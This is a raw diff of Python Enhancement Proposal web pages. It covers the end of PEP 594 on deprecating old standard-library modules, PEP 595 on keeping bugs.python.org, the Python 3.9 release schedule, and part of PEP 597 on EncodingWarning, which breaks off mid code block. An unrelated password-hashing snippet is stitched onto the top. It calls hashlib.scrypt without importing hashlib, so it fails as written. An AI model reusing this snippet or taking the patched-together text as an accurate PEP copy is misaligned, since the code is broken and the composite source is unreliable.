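import hmac
import os

def hash_password(password, salt=None):
    """Return (salt, digest) for the given password using scrypt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password, salt, expected):
    """Constant-time comparison against a previously stored digest."""
    return hmac.compare_digest(hash_password(password, salt)[1], expected)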
+
+

nis

+

The nis module provides +NIS/YP support. Network Information Service / Yellow Pages is an old and +deprecated directory service protocol developed by Sun Microsystems. Its +designed successor NIS+ from 1992 never took off. For a long time, libc’s +Name Service Switch, LDAP, and Kerberos/GSSAPI have been considered a more powerful +and more secure replacement for NIS.

+
+
+

spwd

+

The spwd module provides direct access to the Unix shadow password database using non-standard APIs.

+

In general, it’s a bad idea to use spwd. It circumvents system +security policies, does not use the PAM stack, and is only compatible +with local user accounts, because it ignores NSS. The use of the spwd +module for access control must be considered a security bug, as it bypasses +PAM’s access control.

+

Furthermore, the spwd module uses the +shadow(3) APIs. +Functions like getspnam(3) access the /etc/shadow file directly. This +is dangerous and even forbidden for confined services on systems with a +security engine like SELinux or AppArmor.

+
+
+
+

Misc modules

+
+

mailcap

+

The mailcap package +reads mail capability files to assist in handling a file attachment in +an email. In most modern operating systems the email client itself handles reacting to +file attachments. Operating systems also have their own way to register +handling files by their file name extension. Finally, the module has +CVE-2015-20107 filed +against it while having no maintainer to help fix it.

+
+
+

msilib

+

The msilib package is a Windows-only package. It supports the creation of Microsoft Installers (MSI). The package also exposes additional APIs to create cabinet files (CAB). The module is used by distutils to create MSI installers with the bdist_msi command. In the past it was used to create CPython’s official Windows installer, too.

+

Microsoft is slowly moving away from MSI in favor of Windows 10 Apps (AppX) +as a new deployment model [3].

+
+
+

pipes

+

The pipes module provides helpers to pipe the output of one command into the input of another. The module is built on top of os.popen. Users are encouraged to use the subprocess module instead, as in the sketch below.
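A hedged sketch of the subprocess equivalent of a simple pipes template, i.e. `tr a-z A-Z < infile > outfile` on a POSIX system (the file names are placeholders):

import subprocess

with open("infile", "rb") as src, open("outfile", "wb") as dst:
    subprocess.run(["tr", "a-z", "A-Z"], stdin=src, stdout=dst, check=True)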

+
+
+
+
+

Modules to keep

+

Some modules were originally proposed for deprecation but are no longer +listed as such in this PEP.

Table 2: Withdrawn deprecations

Module    | Deprecated in | Replacement
----------|---------------|------------
colorsys  | -             | colormath, colour, colorspacious, Pillow
fileinput | -             | argparse
getopt    | -             | argparse, optparse
optparse  | 3.2           | argparse
wave      | -             | -
+

colorsys

+

The colorsys module +defines color conversion functions between RGB, YIQ, HSL, and HSV coordinate +systems.

+

Walter Dörwald, Petr Viktorin, and others requested keeping colorsys. The module is useful for converting CSS colors between coordinate systems. The implementation is simple, mature, and does not impose maintenance overhead on core development.

+

The PyPI packages colormath, colour, and colorspacious provide more advanced features. The Pillow library is better suited to transforming images between color systems.

+
+
+

fileinput

+

The fileinput module +implements helpers to iterate over a list of files from sys.argv. The +module predates the optparse and argparse modules. The same functionality +can be implemented with the argparse module.

+

Several core developers expressed interest in keeping the module in the standard library, as it is handy for quick scripts.

+
+
+

getopt

+

The getopt module mimics +C’s getopt() option parser.

+

Although users are encouraged to use argparse instead, the getopt module is +still widely used. The module is small, simple, and handy for C developers +to write simple Python scripts.
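For example, a minimal sketch of the familiar C-style interface (the option letters and messages are illustrative only):

import getopt
import sys

opts, args = getopt.getopt(sys.argv[1:], "ho:v", ["help", "output="])
for opt, value in opts:
    if opt in ("-h", "--help"):
        print("usage: tool [-h] [-o FILE] [-v] [args...]")
    elif opt in ("-o", "--output"):
        print("output file:", value)
    elif opt == "-v":
        print("verbose mode")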

+
+
+

optparse

+

The optparse module is +the predecessor of the argparse module.

+

Although it has been deprecated for many years, it’s still too widely used to remove.

+
+
+

wave

+

The wave module provides +support for the WAV sound format.

+

The module is not deprecated, because the WAV format is still relevant these +days. The wave module is also used in education, e.g. to show kids how +to make noise with a computer.

+

The module uses one simple function from the audioop module to perform byte swapping between little- and big-endian formats. Before 24-bit WAV support was added, byte swapping used to be implemented with the array module. To remove wave’s dependency on audioop, the byte-swap function could either be moved to another module (e.g. operator), or the array module could gain support for 24-bit (3-byte) arrays.
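A hedged sketch of that byte-swap operation expressed with the array module:

import array

samples = array.array("h", [1, 256, -2])  # 16-bit signed samples
samples.byteswap()                        # little <-> big endian, in place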

+
+
+
+

Discussions

+
    +
  • Elana Hashman and Alyssa Coghlan suggested keeping the getopt module.
  • +
  • Berker Peksag proposed to deprecate and remove msilib.
  • +
  • Brett Cannon recommended to delay active deprecation warnings and removal +of modules like imp until Python 3.10. Version 3.8 will be released +shortly before Python 2 reaches end-of-life. A delay reduced churn for +users that migrate from Python 2 to 3.8.
  • +
  • At one point, distutils was mentioned in the same sentence as this PEP. +To avoid lengthy discussion and delay of the PEP, I decided against dealing +with distutils. Deprecation of the distutils package will be handled by +another PEP.
  • +
  • Multiple people (Gregory P. Smith, David Beazley, Alyssa Coghlan, …) +convinced me to keep the wave module. [4]
  • +
  • Gregory P. Smith proposed to deprecate nntplib. [4]
  • +
  • Andrew Svetlov mentioned the socketserver module is questionable. +However it’s used to implement http.server and xmlrpc.server. The +stdlib doesn’t have a replacement for the servers, yet.
  • +
+
+
+

Rejected ideas

+
+

Creating/maintaining a separate repo for the deprecated modules

+

It was previously proposed to create a separate repository containing the +deprecated modules packaged for installation. One of the PEP authors went so far +as to create a demo repository. In the +end, though, it was decided that the added workload to create and maintain such +a repo officially wasn’t justified, as the source code will continue to be +available in the CPython repository for people to vendor as necessary. Similar +work has also not been done when previous modules were deprecated and removed, +and it seemingly wasn’t an undue burden on the community.

+
+
+
+

Update history

+
+

Update 1

+
    +
  • Deprecate parser module
  • +
  • Keep fileinput module
  • +
  • Elaborate why crypt and spwd are dangerous and bad
  • +
  • Improve sections for cgitb, colorsys, nntplib, and smtpd modules
  • +
  • The colorsys, crypt, imghdr, sndhdr, and spwd sections now +list suitable substitutions
  • +
  • Mention that socketserver is going to stay for http.server and +xmlrpc.server
  • +
  • The future maintenance section now states that the deprecated modules +may be adopted by Python community members
  • +
+
+
+

Update 2

+
    +
  • Keep colorsys module
  • +
  • Add experts
  • +
  • Redirect discussions to discuss.python.org
  • +
  • Deprecate telnetlib
  • +
  • Deprecate compat32 policy of email package
  • +
  • Add creation year to overview table
  • +
  • Mention PEP 206 and PEP 3108
  • +
  • Update sections for aifc, audioop, cgi, and wave.
  • +
+
+
+

Update 3

+
    +
  • Keep the legacy email API modules. Internal deprecations will be +handled separately.
  • +
+
+
+

Update 4

+
    +
  • Add Brett as a co-author.
  • +
  • Retarget the PEP for Python 3.11.
  • +
  • Examples of how to replace the relevant parts of cgi +(thanks Martijn Pieters).
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0594.rst

+

Last modified: 2024-05-25 13:48:58 GMT

diff --git a/pep-0595/index.html b/pep-0595/index.html
new file mode 100644
index 00000000000..e37df74abcd
--- /dev/null
+++ b/pep-0595/index.html
@@ -0,0 +1,501 @@

PEP 595 – Improving bugs.python.org | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 595 – Improving bugs.python.org

+
+
Author:
+
Ezio Melotti <ezio.melotti at gmail.com>, Berker Peksag <berker.peksag at gmail.com>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
12-May-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a list of improvements to make bugs.python.org +more usable for contributors and core developers. This PEP also +discusses why remaining on Roundup should be preferred over +switching to GitHub Issues, as proposed by PEP 581.

+
+
+

Resolution

+

2020-06-25: With the acceptance of PEP 581, the move to GitHub for +issues is proceeding, this PEP is being marked as a withdrawn +informational PEP.

+
+
+

Motivation

+

On May 14th, 2019, PEP 581 was accepted without much public discussion and without a clear consensus. The PEP contains factual errors and doesn’t address some of the issues that the migration to GitHub Issues might present.

+

Given the scope of the migration, the amount of work required, +and how it will negatively affect the workflow during the +transition phase, this decision should be re-evaluated.

+
+
+

Roundup advantages over GitHub Issues

+

This section discusses reasons why Roundup should be preferred +over GitHub Issues and Roundup features that are not available +on GitHub Issues.

+
    +
  • Roundup is the status quo. Roundup has been an integral +part of the CPython workflow for years. It is a stable product +that has been tested and customized to adapt to our needs as the +workflow evolved.

    It is possible to gradually improve it and avoid the disruption +that a switch to a different system would inevitably bring to +the workflow.

    +
  • +
  • Open-source and Python powered. Roundup is an open-source +project and is written in Python. By using it and supporting +it, we also support the Python ecosystem. Several features +developed for bpo have also been ported to upstream Roundup +over the years.
  • +
  • Fully customizable. Roundup can be (and has been) fully +customized to fit our needs.
  • +
  • Finer-grained access control. Roundup allows the creation +of different roles with different permissions (e.g. create, +view, edit, etc.) for each individual property, and users can +have multiple roles.
  • +
  • Flexible UI. While Roundup UI might look dated, it is +convenient and flexible.

For example, on the issue page, each field (e.g. title, type, versions, status, linked files and PRs, etc.) has appropriate UI elements (input boxes, dropdowns, tables, etc.) that are easy to set and also provide a convenient way to get info about the issue at a glance. The number of fields, their values, and the UI element they use is also fully customizable. GitHub only provides labels.

    +

The issue list page presents the issues in a compact and easy-to-read table with separate columns for different fields. For comparison, Roundup lists 50 issues on one screen, whereas GitHub takes two screens to show 25 issues.

    +
  • +
  • Advanced search. Roundup provides an accurate way to search +and filter by using any combination of issue fields. +It is also possible to customize the number of results and the +fields displayed in the table, and the sorting and grouping +(up to two levels).

    bpo also provides predefined summaries (e.g. “Created by you”, +“Assigned to you”, etc.) and allows the creation of custom +search queries that can be conveniently accessed from the sidebar.

    +
  • +
  • Nosy list autocomplete. The nosy list has an autocomplete +feature that suggests maintainers and experts. The suggestions +are automatically updated when the experts index changes.
  • +
  • Dependencies and Superseders. Roundup allows specifying dependencies that must be addressed before the current issue can be closed, and a superseder issue to easily mark duplicates (for example, bpo-12078). The list of dependencies can also be used to create meta-issues that reference several other sub-issues (for example, bpo-26865).
  • +
+
+
+

Improving Roundup

+

This section lists some of the issues mentioned by PEP 581 +and other desired features and discusses how they can be implemented +by improving Roundup and/or our instance.

+
    +
  • REST API support. A REST API will make integration with other +services and the development of new tools and applications easier.

    Upstream Roundup now supports a REST API. Updating the tracker will +make the REST API available.

    +
  • +
  • GitHub login support. This will allow users to login +to bugs.python.org (bpo) without having to create a new account. +It will also solve issues with confirmation emails being marked +as spam, and provide two-factor authentication.

    A patch to add this functionality is already available +and is being integrated at the time of writing.

    +
  • +
  • Markdown support and message preview and editing. This feature +will allow the use of Markdown in messages and the ability to +preview the message before the submission and edit it afterward.

    This can be done, but it will take some work. Possible solutions +have been proposed on the roundup-devel mailing list.

    +
  • +
  • “Remove me from nosy list” button. Add a button on issue pages +to remove self from the nosy list.

    This feature will be added during GSoC 2019.

    +
  • +
  • Mobile friendly theme. Current theme of bugs.python.org looks +dated and it doesn’t work well with mobile browsers.

    A mobile-friendly theme that is more modern but still familiar +will be added.

    +
  • +
  • Move reply box close to the last message. The reply box is +located at the top of the page, whereas the last message is at the +bottom.

    The reply box can be moved or duplicated after the last message.

    +
  • +
  • Real-time updates. When another user submits changes to an issue, they should show up in real time.

    This can be accomplished by using the REST API.

    +
  • +
  • Add PR link to BPO emails. Currently bpo emails don’t include +links to the corresponding PRs.

    A patch +is available to change the content of the bpo emails from:

    +
    components: +Tkinter
    +versions: +Python 3.4
    +pull_requests: +42
    +
    +
    +

    to:

    +
    components: +Tkinter
    +versions: +Python 3.4
    +pull_request: https://github.com/python/cpython/pull/341
    +
    +
    +
  • +
  • Python 3 support. Using Python 3 will make maintenance easier.

    Upstream Roundup now supports Python 3. Updating the tracker will +allow us to switch to Python 3. The instances will need to be +updated as well.

    +
  • +
  • Use upstream Roundup. We currently use a fork of Roundup with +a few modifications, most notably the GitHub integration. If this +is ported upstream, we can start using upstream Roundup without +having to maintain our fork.
  • +
+
+
+

PEP 581 issues

+

This section addresses some errors and inaccuracies found in PEP 581.

+

The “Why GitHub?” section of PEP 581 lists features currently available on GitHub Issues but not on Roundup. Some of these features are actually supported:

+
    +
  • “Ability to reply to issue and pull request conversations via email.”
      +
    • Being able to reply by email has been one of the core features of +Roundup since the beginning. It is also possible to create new +issues or close existing ones, set or modify fields, and add +attachments.
    • +
    +
  • +
  • “Email notifications containing metadata, integrated with Gmail, +allowing systematic filtering of emails.”
      +
    • Emails sent by Roundup contains metadata that can be used for +filtering.
    • +
    +
  • +
  • “Additional privacy, such as offering the user a choice to hide an +email address, while still allowing communication with the user +through @-mentions.”
      +
    • Email addresses are hidden by default to users that are not +registered. Registered users can see other users’ addresses +because we configured the tracker to show them. It can easily +be changed if desired. Users can still be added to the nosy +list by using their username even if their address is hidden.
    • +
    +
  • +
  • “Ability to automatically close issues when a PR has been merged.”
      +
    • The GitHub integration of Roundup automatically closes issues +when a commit that contains “fixes issue <id>” is merged. +(Alternative spellings such as “closes” or “bug” are also supported.) +See this message +for a recent example of this feature.
    • +
    +
  • +
  • “Support for permalinks, allowing easy quoting and copying & +pasting of source code.”
      +
    • Roundup has permalinks for issues, messages, attachments, etc. In addition, Roundup makes it easy to rewrite broken URLs in messages (e.g. if the code hosting changes).
    • +
    +
  • +
  • “Core developers, volunteers, and the PSF don’t have to maintain the +issue infrastructure/site, giving us more time and resources to focus +on the development of Python.”
      +
    • While this is partially true, additional resources are required to +write and maintain bots.

In some cases, bots are required to work around GitHub’s lack of features rather than to add new ones. This webhook was written specifically to work around GitHub’s email integration.

      +

Updating our bots to stay up-to-date with changes in the GitHub API also has a maintenance cost. This recent incident caused by GitHub took two days to fix.

      +

      In addition, we will still need to maintain Roundup for bpo (even +if it becomes read-only) and for the other trackers +we currently host/maintain (Jython +and Roundup).

      +
    • +
    +
  • +
+

The “Issues with Roundup / bpo” section of PEP 581 lists some issues +that have already been fixed:

+
    +
  • “The upstream Roundup code is in Mercurial. Without any CI available, +it puts heavy burden on the few existing maintainers in terms of +reviewing, testing, and applying patches.” +
  • +
  • “There is no REST API available. There is an open issue in Roundup for +adding REST API. Last activity was in 2016.”
      +
    • The REST API has been integrated and it’s now available in Roundup.
    • +
    +
  • +
  • “Users email addresses are exposed. There is no option to mask it.”
      +
    • Exposing addresses to registered and logged in users was a decision +taken when our instance was set up.

      This has now been changed to make the email addresses hidden for +regular users too (Developers and Coordinators can still see them). +The “Email address” column from the user listing page has been +removed too.

      +
    • +
    +
  • +
  • “It sends a number of unnecessary emails and notifications, and it is +difficult, if not impossible, to configure.”
      +
    • This can be configured.
    • +
    +
  • +
  • “Creating an account has been a hassle. There have been reports of people +having trouble creating accounts or logging in.”
      +
    • The main issue is confirmation emails being marked as spam. Work has +been done to resolve the issue.
    • +
    +
  • +
+
+
+

Migration considerations

+

This section describes issues with the migration that might not have been addressed by PEP 581 and PEP 588.

+

PEP 588 suggests to add a button to migrate issues to GitHub +only when someone wants to keep working on them. This approach +has several issues, but there are also other issues that will +need to be addressed regardless of the approach used:

+
    +
  • Vendor lock-in. GitHub is proprietary and there is risk +of vendor lock-in. Their business model might change and they +could shut down altogether. For example, several projects +decided to move away from GitHub after Microsoft acquisition.

    If/when the repository is no longer available on GitHub, we will +be forced to migrate again and all the links to the issues won’t +work anymore.

    +
  • +
  • Required bpo updates. bpo will need to be updated in order +to add a button that, once pressed, creates a new issue on +GitHub, copies over all the messages, attachments, and +creates/adds labels for the existing fields. Permissions will +also need to be tweaked to make individual issues read-only +once they are migrated, and to prevent users to create new +accounts. It might be necessary to set up redirects (see below).
  • +
  • Two trackers. If issues are migrated on demand, the issues will be split between two trackers. Referencing and searching issues will take significantly more effort.
  • +
  • Lossy conversion. GitHub’s only mechanism to add custom metadata is through labels. bpo uses a number of fields to specify several different kinds of metadata. Preserving all fields and values will result in too many labels. If only some fields and values are preserved, the others will be lost (unless there is a way to preserve them elsewhere).
  • +
  • Issue IDs preservation. GitHub doesn’t provide a way to +set and preserve the ID of migrated issues. Some projects managed +to preserve the IDs by contacting the GitHub staff and migrating +the issues en masse. However, this is no longer possible, since +PRs and issues share the same namespace and PRs already use +existing bpo issue IDs.
  • +
  • Internal issue links preservation. Existing issues might +contain references to other issues in messages and fields (e.g. +dependencies or superseder). Since the issue ID will change +during the migration, these will need to be updated. If the +issues are migrated on demand, all the existing internal +references to the migrated issues (on both bpo and GitHub issues) +will have to be updated.

    Setting up a redirect for each migrated issue on bpo might +mitigate the issue, however – if references in migrated messages +are not updated – it will cause confusion (e.g. if bpo issue +#1234 becomes GitHub issue #4321, a reference to #1234 +in a migrated message could link to bpo #1234 and bpo can +redirect to GitHub issue #4321, but new references to #1234 +will link to GitHub PR #1234 rather than GitHub issue #4321). +Manually having to specify a bpo- or gh- prefix is error prone.

    +
  • +
  • External issue links preservation. A number of websites, +mails, etc. link to bpo issues. If bpo is shut down, these links +will break. If we don’t want to break the links, we will have to +keep bpo alive and set up a redirect system that links to the +corresponding GitHub issue.

    In addition, if GitHub shuts down, we won’t have any way to setup +redirects and preserve external links to GitHub issues.

    +
  • +
  • References preservation and updating. In addition to issue +references, bpo converts a number of other references into links, +including message and PR IDs, changeset numbers, legacy SVN +revision numbers, paths to files in the repo, files in tracebacks +(detecting the correct branch), and links to devguide pages and +sections.

    Since Roundup converts references to links when messages are +requested, it is possible to update the target and generate the +correct link. This need already arose several times, for +example: files and HG changesets moved from hg.python.org to +GitHub and the devguide moved from docs.python.org/devguide to +devguide.python.org.

    +

    Since messages on GitHub are static, the links will need to be +generated and hardcoded during the migration or they will be lost. +In order to update them, a tool to find all references and +regenerate the links will need to be written.

    +
  • +
  • Roundup and bpo maintenance. On top of the aforementioned +changes to bpo and development of tools required to migrate to +GitHub issues, we will still need to keep running and maintaining +Roundup, both for our bpo instance (read-only) and for the Jython +and Roundup trackers (read-write).

    Even if eventually we migrate all bpo issues to GitHub and we stop +maintaining Jython and Roundup, bpo will need to be maintained +and redirect to the corresponding GitHub issues.

    +
  • +
  • Bots maintenance. Since it’s not possible to customize GitHub +directly, it’s also necessary to write, maintain, and host bots. +Even if eventually we stop maintaining Roundup, the maintenance +burden simply shifted from Roundup to the bots. Hosting each +different bot also has a monetary cost.
  • +
  • Using issue templates. Manually editing issue templates to +“remove texts that don’t apply to [the] issue” is cumbersome and +error-prone.
  • +
  • Signal to noise ratio. Switching to GitHub Issues will +likely increase the number of invalid reports and increase +the triaging effort. This concern has been raised in the past +in a Zulip topic.

There have already been cases where people posted comments on PRs that required moderators to mark them as off-topic or disruptive, delete them altogether, and even lock the conversation (for example, this PR).

    +
  • +
  • Weekly tracker reports and stats. Roundup sends weekly reports +to python-dev with a summary that includes new issues, recent +issues with no replies, recent issues waiting for review, most +discussed issues, closed issues, and deltas for open/closed/total +issue counts (for example, see this summary). +The report provides an easy way to keep track +of the tracker activity and to make sure that issues that require +attention are noticed.

The data collected by the weekly report is also used to generate statistics and graphs that can be used to gain new insights.

    +
  • +
  • bpo-related MLs. There are currently two mailing lists where +bpo posts new tracker issues and all messages respectively: +new-bugs-announce +and python-bugs-list. +A new system will need to be developed to preserve this functionality. These MLs +offer additional ways to keep track of the tracker activity.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0595.rst

+

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0596/index.html b/pep-0596/index.html
new file mode 100644
index 00000000000..9424a8273d4
--- /dev/null
+++ b/pep-0596/index.html
@@ -0,0 +1,253 @@

PEP 596 – Python 3.9 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 596 – Python 3.9 Release Schedule

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
04-Jun-2019
+
Python-Version:
+
3.9
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.9. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.9 Release Manager: Łukasz Langa
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.9.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.9 development begins: Tuesday, 2019-06-04
  • +
  • 3.9.0 alpha 1: Tuesday, 2019-11-19
  • +
  • 3.9.0 alpha 2: Wednesday, 2019-12-18
  • +
  • 3.9.0 alpha 3: Saturday, 2020-01-25
  • +
  • 3.9.0 alpha 4: Wednesday, 2020-02-26
  • +
  • 3.9.0 alpha 5: Monday, 2020-03-23
  • +
  • 3.9.0 alpha 6: Tuesday, 2020-04-28
  • +
  • 3.9.0 beta 1: Monday, 2020-05-18 +(No new features beyond this point.)
  • +
  • 3.9.0 beta 3: Tuesday, 2020-06-09 +(beta 2 was recalled.)
  • +
  • 3.9.0 beta 4: Friday, 2020-07-03
  • +
  • 3.9.0 beta 5: Monday, 2020-07-20
  • +
  • 3.9.0 candidate 1: Tuesday, 2020-08-11
  • +
  • 3.9.0 candidate 2: Thursday, 2020-09-17
  • +
  • 3.9.0 final: Monday, 2020-10-05
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.9.1 candidate 1: Tuesday, 2020-11-24
  • +
  • 3.9.1 final: Monday, 2020-12-07
  • +
  • 3.9.2 candidate 1: Tuesday, 2021-02-16
  • +
  • 3.9.2 final: Friday, 2021-02-19
  • +
  • 3.9.3: Friday, 2021-04-02 (security hotfix; recalled due to bpo-43710)
  • +
  • 3.9.4: Sunday, 2021-04-04 (ABI compatibility hotfix)
  • +
  • 3.9.5: Monday, 2021-05-03
  • +
  • 3.9.6: Monday, 2021-06-28
  • +
  • 3.9.7: Monday, 2021-08-30
  • +
  • 3.9.8: Friday, 2021-11-05 (recalled due to bpo-45235)
  • +
  • 3.9.9: Monday, 2021-11-15
  • +
  • 3.9.10: Friday, 2022-01-14
  • +
  • 3.9.11: Wednesday, 2022-03-16
  • +
  • 3.9.12: Wednesday, 2022-03-23
  • +
  • 3.9.13: Tuesday, 2022-05-17 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 2025.

+
    +
  • 3.9.14: Tuesday, 2022-09-06
  • +
  • 3.9.15: Tuesday, 2022-10-11
  • +
  • 3.9.16: Tuesday, 2022-12-06
  • +
  • 3.9.17: Tuesday, 2023-06-06
  • +
  • 3.9.18: Thursday, 2023-08-24
  • +
  • 3.9.19: Tuesday, 2024-03-19
  • +
  • 3.9.20: Friday, 2024-09-06
  • +
  • 3.9.21: Tuesday, 2024-12-03
  • +
+
+
+

3.9 Lifespan

+

3.9 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.10.0 final, +the ninth and final 3.9 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.9 final, so until approximately +October 2025.

+
+
+
+

Features for 3.9

+

Implemented PEPs for 3.9:

+
    +
  • PEP 573, Module State Access from C Extension Methods
  • +
  • PEP 584, Add Union Operators To dict
  • +
  • PEP 585, Type Hinting Generics In Standard Collections
  • +
  • PEP 593, Flexible function and variable annotations
  • +
  • PEP 614, Relaxing Grammar Restrictions On Decorators
  • +
  • PEP 615, Support for the IANA Time Zone Database in the Standard Library
  • +
  • PEP 616, String methods to remove prefixes and suffixes
  • +
  • PEP 617, New PEG parser for CPython
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0596.rst

+

Last modified: 2024-12-05 19:08:36 GMT

diff --git a/pep-0597/index.html b/pep-0597/index.html
new file mode 100644
index 00000000000..2da4d761aad
--- /dev/null
+++ b/pep-0597/index.html
@@ -0,0 +1,464 @@

PEP 597 – Add optional EncodingWarning | peps.python.org
+
+

+
+
+

PEP 597 – Add optional EncodingWarning

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Jun-2019
+
Python-Version:
+
3.10
+
+
+
+
+
+

Abstract

+

Add a new warning category EncodingWarning. It is emitted when the +encoding argument to open() is omitted and the default +locale-specific encoding is used.

+

The warning is disabled by default. A new -X warn_default_encoding +command-line option and a new PYTHONWARNDEFAULTENCODING environment +variable can be used to enable it.

+

A "locale" argument value for encoding is added too. It +explicitly specifies that the locale encoding should be used, silencing +the warning.

+
+
+

Motivation

+
+

Using the default encoding is a common mistake

+

Developers using macOS or Linux may forget that the default encoding +is not always UTF-8.

+

For example, using long_description = open("README.md").read() in +setup.py is a common mistake. Many Windows users cannot install +such packages if there is at least one non-ASCII character +(e.g. emoji, author names, copyright symbols, and the like) +in their UTF-8-encoded README.md file.

+
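
A minimal sketch of the fix, for illustration (not taken verbatim from the PEP): declare the encoding at the call site, so the read no longer depends on the locale.

+
# Reads identically on every platform, regardless of the locale encoding:
+long_description = open("README.md", encoding="utf-8").read()
+
+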

Of the 4000 most downloaded packages from PyPI, 489 use non-ASCII +characters in their README, and 82 fail to install from source on +non-UTF-8 locales due to not specifying an encoding for a non-ASCII +file. [1]

+

Another example is logging.basicConfig(filename="log.txt"). +Some users might expect it to use UTF-8 by default, but the locale +encoding is actually what is used. [2]

+

Even Python experts may assume that the default encoding is UTF-8. +This creates bugs that only happen on Windows; see [3], [4], [5], +and [6] for example.

+

Emitting a warning when the encoding argument is omitted will help +find such mistakes.

+
+
+

Explicit way to use locale-specific encoding

+

open(filename) isn’t explicit about which encoding is expected:

+
    +
  • If ASCII is assumed, this isn’t a bug, but may result in decreased +performance on Windows, particularly with non-Latin-1 locale encodings
  • +
  • If UTF-8 is assumed, this may be a bug or a platform-specific script
  • +
  • If the locale encoding is assumed, the behavior is as expected +(but could change if future versions of Python modify the default)
  • +
+

From this point of view, open(filename) is not readable code.

+

encoding=locale.getpreferredencoding(False) can be used to +specify the locale encoding explicitly, but it is too long and easy +to misuse (e.g. one can forget to pass False as its argument).

+

This PEP provides an explicit way to specify the locale encoding.

+
+
+

Prepare to change the default encoding to UTF-8

+

Since UTF-8 has become the de-facto standard text encoding, +we might default to it for opening files in the future.

+

However, such a change will affect many applications and libraries. +If we start emitting DeprecationWarning everywhere the encoding +argument is omitted, it will be too noisy and painful.

+

Although this PEP doesn’t propose changing the default encoding, +it will help enable that change by:

+
    +
  • Reducing the number of omitted encoding arguments in libraries +before we start emitting a DeprecationWarning by default.
  • +
  • Allowing users to pass encoding="locale" to suppress the current warning and any DeprecationWarning added in the future, and to retain consistent behaviour if a later Python version changes the default, on any Python version >= 3.10.
  • +
+
+
+
+

Specification

+
+

EncodingWarning

+

Add a new EncodingWarning warning class as a subclass of +Warning. It is emitted when the encoding argument is omitted and +the default locale-specific encoding is used.

+
+
+

Options to enable the warning

+

The -X warn_default_encoding option and the +PYTHONWARNDEFAULTENCODING environment variable are added. They +are used to enable EncodingWarning.

+

sys.flags.warn_default_encoding is also added. The flag is true when +EncodingWarning is enabled.

+

When the flag is set, io.TextIOWrapper(), open() and other +modules using them will emit EncodingWarning when the encoding +argument is omitted.

+

Since EncodingWarning is a subclass of Warning, it is shown by default (when the warn_default_encoding flag is set), unlike DeprecationWarning.

+
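
A minimal sketch of how this surfaces at runtime (assuming Python 3.10+; the file name and printed details are illustrative only):

+
import sys
+import warnings
+
+# Run as:  python -X warn_default_encoding demo.py
+#     or:  PYTHONWARNDEFAULTENCODING=1 python demo.py
+print(sys.flags.warn_default_encoding)  # 1 when the option is active
+
+with warnings.catch_warnings():
+    # Promote the warning to an error so it is easy to observe.
+    warnings.simplefilter("error", EncodingWarning)
+    try:
+        open("demo.txt", "w").close()  # encoding omitted
+    except EncodingWarning as exc:
+        print("caught:", exc)
+
+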
+
+

encoding="locale"

+

io.TextIOWrapper will accept "locale" as a valid argument to +encoding. It has the same meaning as the current encoding=None, +except that io.TextIOWrapper doesn’t emit EncodingWarning when +encoding="locale" is specified.

+
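
A brief sketch of the intended usage (Python 3.10+; the file name is illustrative):

+
# Explicitly opt in to the locale encoding; behaves like omitting
+# encoding=, but never triggers EncodingWarning:
+with open("legacy.txt", encoding="locale") as f:
+    data = f.read()
+
+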
+
+

io.text_encoding()

+

io.text_encoding() is a helper for functions with an +encoding=None parameter that pass it to io.TextIOWrapper() or +open().

+

A pure Python implementation will look like this:

+
def text_encoding(encoding, stacklevel=1):
+    """A helper function to choose the text encoding.
+
+    When *encoding* is not None, just return it.
+    Otherwise, return the default text encoding (i.e. "locale").
+
+    This function emits an EncodingWarning if *encoding* is None and
+    sys.flags.warn_default_encoding is true.
+
+    This function can be used in APIs with an encoding=None parameter
+    that pass it to TextIOWrapper or open.
+    However, please consider using encoding="utf-8" for new APIs.
+    """
+    if encoding is None:
+        if sys.flags.warn_default_encoding:
+            import warnings
+            warnings.warn(
+                "'encoding' argument not specified.",
+                EncodingWarning, stacklevel + 2)
+        encoding = "locale"
+    return encoding
+
+
+

For example, pathlib.Path.read_text() can use it like this:

+
def read_text(self, encoding=None, errors=None):
+    encoding = io.text_encoding(encoding)
+    with self.open(mode='r', encoding=encoding, errors=errors) as f:
+        return f.read()
+
+
+

By using io.text_encoding(), EncodingWarning is emitted for +the caller of read_text() instead of read_text() itself.

+
+
+

Affected standard library modules

+

Many standard library modules will be affected by this change.

+

Most APIs accepting encoding=None will use io.text_encoding() +as written in the previous section.

+

Where using the locale encoding as the default encoding is reasonable, +encoding="locale" will be used instead. For example, +the subprocess module will use the locale encoding as the default +for pipes.

+

Many tests use open() without specifying an encoding in order to read ASCII text files. They should be rewritten to use encoding="ascii".

+
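
For illustration, a hedged sketch of both conventions (Python 3.10+; the command and file names are only examples):

+
import subprocess
+
+# Pipes where the locale encoding is genuinely intended can say so:
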